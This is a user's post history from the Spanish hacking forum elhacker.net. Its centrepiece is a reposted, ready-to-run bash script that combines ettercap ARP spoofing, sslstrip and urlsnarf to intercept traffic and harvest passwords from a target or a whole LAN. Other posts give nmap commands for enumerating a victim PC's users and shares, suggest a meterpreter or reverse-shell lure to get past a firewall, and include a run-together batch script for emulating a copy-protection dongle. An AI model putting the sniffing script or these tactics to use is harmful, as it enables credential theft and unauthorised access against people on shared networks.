elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: [1] 2 3
1  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / feature phones O_o en: 1 Febrero 2012, 06:50 am
Me encuentro realizando una investigacion sobre los feature phones y me salta la duda, derivado a la demanda de estos telefonos, que piensan ustedes que deberian de tener los feature phones para hacer crecer el consumo de navegacion en los mismos teniendo encuenta de que hay planes de navegacion bastante economicos y la mayoria ya cuentan con aplicaciones para redes sociales preinstaladas que hacen mas llamativo al telefono.

Cualquier ayuda es bienvenida.

Saludos.
2  Informática / Hardware / Necesito una laptop en: 12 Octubre 2011, 07:08 am
Buenas, quisiera que alguien me recomendara una buena portatil, estoy pensando en comprar una ya que la mia ya dio todo lo que podia la pobre; ando buscando algo mas o menos potente como un core i5 talvez; buena ram y sobre todo una tarjeta wifi que pueda ponerse en monitor realizar inyecciones  >:D, el precio pues que no pase de 900€ o 1000€, he buscado pero ninguna me convence, necesito asesoramiento. Adjunto imagenes de la actual, ya ni las teclas funcionan :(, con ella fueron los mejores hacks...  ;-)

El cable que sale esta conectado a una antena omnidireccional de 8dbi en el techo de mi casa  :rolleyes:  :xD  :silbar:

3  Seguridad Informática / Hacking / Re: IP Poisoning corta internet en maquina victima en: 10 Febrero 2011, 15:15 pm
si te sirve a mi me ha funcionado mucho este

Sniffeando contraseñas y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf

(No vi nada en las reglas sobre esto, si estoy cometiendo alguna falta les pido disculpas y que el moderador corrija o borre el tema)

Encontre este articulo en un foro que proporciona una herramienta muy buena para hacer sniffing de datos sobre las redes lan/wan, fue publicado en el foro de bactrack-linux.org por Teddy Strand, y fue traducido con la herramienta microsoft translator y otras partes por mi persona, los codigos no fueron modificados para su correcta ejecucion. 

La publicacion es la siguiente:

Estoy cansado de escribir comandos indefinidamente mientras hago pentest a mi red. Así que empecé a escribir scritps para cualquier cosa que hago. Este script es el que utilizo en su mayoría.
Aún soy muy nuevo en BackTrack/Linux, pero esta secuencia de comandos realmente funciona para mí y seguro que otros principiantes pueden hacer buen uso de el.

En primer lugar, asegurate de que la configuracion de etter.conf  tenga el valor por defecto. Tu etter.conf se encuentra en /etc/etter.conf - esta sección debe permanecer comentada:
Código:
# if you use iptables: 
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Esto es porque yo utilizo el ettercap para hacer el arpspoofing, pero no quiero que haga lo del certificado falso (tenemos el sslstrip para que haga el trabajo).

Guarda este código en un archivo de texto y nombralo como loquesea.sh (asegúrese de darle permisos de ejecutable con chmod +x loquesea.sh)

Código:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

Este script ejecutara sslstrip + archivo de registro, urlsnarf (devolviendo todas las urls a un archivo de texto), ettercap con arpspoofing + archivos de registro (con las contraseñas) + un archivo pcap (para un mayor analisis). Todos los archivos son puestos en el mismo folder, con nombres identicos (claro que con diferente extension).

Por otra parte al salir correctamente del script (y ettercap) con la tecla "q", el script limpiara todo el solo (saliendo de sslstrip, urlsnarf y vaciando el iptables). Por ultimo lee automáticamente las contraseñas desde el archivo de registro de ettercap (.eci) y se ejecuta wireshark para un mayor análisis.

Tip: Para mí, la forma más sencilla de cargar imágenes desde un archivo pcap (que genera el script), es mediante el uso de NetworkMiner para windows. Se ejecuta sin problemas a través de wine, si lo ajustas un poco como muestra de este tutorial:
http://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

Espero que les sea de ayuda.

Saludos
4  Seguridad Informática / Hacking / Re: que metodo funciona mejor contra un firewall? en: 3 Enero 2011, 04:45 am
Yo preferiria utilizar un dns poison, o como dices un exploit por browser, aunque lo mejor seria ingenieria social con algun archivo con meterpreter o reverse shell.

Saludos
5  Seguridad Informática / Hacking / Re: Quitar contraseña de Administrador en Windows XP Professional en: 29 Diciembre 2010, 07:47 am
Te aseguraste de cambiar el nombre al volumen de la usb, deberia de ser TRK_3-3
6  Seguridad Informática / Hacking / MITM Bloqueado en: 28 Diciembre 2010, 20:49 pm
No puedo realizar exitisamente el ataque y creo que se debe a que la pc tiene un Host intrusion prevention de mcafee o si es por el gw que es cisco o por ambos, no creo que tenga que ver que las ips sean estaticas, si alguien me pudiera confirmar y ayudarme en esto, gracias.
7  Seguridad Informática / Hacking / Re: Averiguar Contraseña Remote Administrator?? en: 27 Diciembre 2010, 21:04 pm
No se si estamos hablando de lo mismo pero prueba con "trial"
8  Seguridad Informática / Hacking / Re: Quitar contraseña de Administrador en Windows XP Professional en: 21 Diciembre 2010, 05:43 am
Es tan facil como montar la imagen de trinity rescue kit en una usb con unetbooting y el comando winpass LoL  :-X
9  Seguridad Informática / Hacking / Re: Maneras interesantes de usar Nmap en: 18 Diciembre 2010, 22:25 pm
me parece muy bien algunos que me gusta usar para pc's win son :

nmap --script=smb-enum-users para ver los usuarios que estan creados en la pc victima o
nmap --scrip=smb-enum-shares para ver saber que carpetas comparten
nmap --script=vuln para checar vulnerabilidades (muy parecido al --script=smb-check-vulns)

la verdad no se me habia ocurrido agregarle las busquedas con grep pero es interesante.

Saludos
10  Seguridad Informática / Hacking / Re: ¿Como se emulan las llaves lpt (hardlock aladdin)? en: 18 Diciembre 2010, 22:08 pm
pues como yo lo miro en el tutoria hay un install.bat que es el que hace la funcion de la emulacion
Código:
@echo offnet
stop hardlockcopy %SystemRoot%\system32\drivers\hardlock.sys %SystemRoot%\system32\drivers\hardlock.bakdel /Q %SystemRoot%\system32\drivers\hardlock.syscopy HARDLOCK.SYS %SystemRoot%\system32\drivers\net start hardlockEcho -Echo - Emulator was installedEcho -pause-------------------------------------
y si hay un error deberias de ejecutar los comandos manualmente, si no encuentras el archivo harlock.sys deberias de verificar si estas haciendo bien el proceso.

Saludos
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines